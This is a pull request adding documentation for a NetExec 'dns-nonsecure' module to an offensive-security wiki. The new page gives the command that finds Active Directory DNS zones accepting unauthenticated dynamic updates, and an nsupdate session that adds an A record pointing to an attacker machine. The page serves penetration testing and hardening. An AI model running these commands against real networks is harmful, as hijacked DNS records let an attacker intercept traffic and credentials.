### PR TITLE
Documentation for the `dns-nonsecure` module

### DIFF
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -128,6 +128,7 @@
 * [🆕 Enumerate Entra ID](ldap-protocol/enumerate-entra-id.md)
 * [🆕 Dump PSO](dump-pso.md)
 * [🆕 Enumerate scriptPath](ldap-protocol/get-scriptpath.md)
+* [🆕 Enumerate Unsecure DNS Zones](ldap-protocol/enumerate-unsecure-dns-zones.md)
 
 ## WINRM protocol
 

--- a/ldap-protocol/enumerate-unsecure-dns-zones.md
+++ b/ldap-protocol/enumerate-unsecure-dns-zones.md
@@ -1,0 +1,20 @@
+# Enumerate Unsecure DNS Zones
+
+This module enumerates DNS zones that are configured with the `Nonsecure and secure` setting for dynamic updates. This misconfiguration allows **unauthenticated users** to add DNS records and, in some cases, delete or modify existing records.
+
+```bash
+nxc smb $DC_IP -u $USER -p $PASSWORD -M dns-nonsecure
+```
+
+## Exploitation
+
+If you find misconfigured zones, you can interact with dynamic updates through `nsupdate`. Here is an example of adding an **A record** that points to the attacker machine:
+
+```bash
+nsupdate
+> server $TARGET
+> zone $ZONE
+> update add $RECORD.$ZONE 0 A $ATTACKER_IP
+> show
+> send
+```


### PR DESCRIPTION
This PR adds documentation for the `dns-nonsecure` module added in : https://github.com/Pennyw0rth/NetExec/pull/1038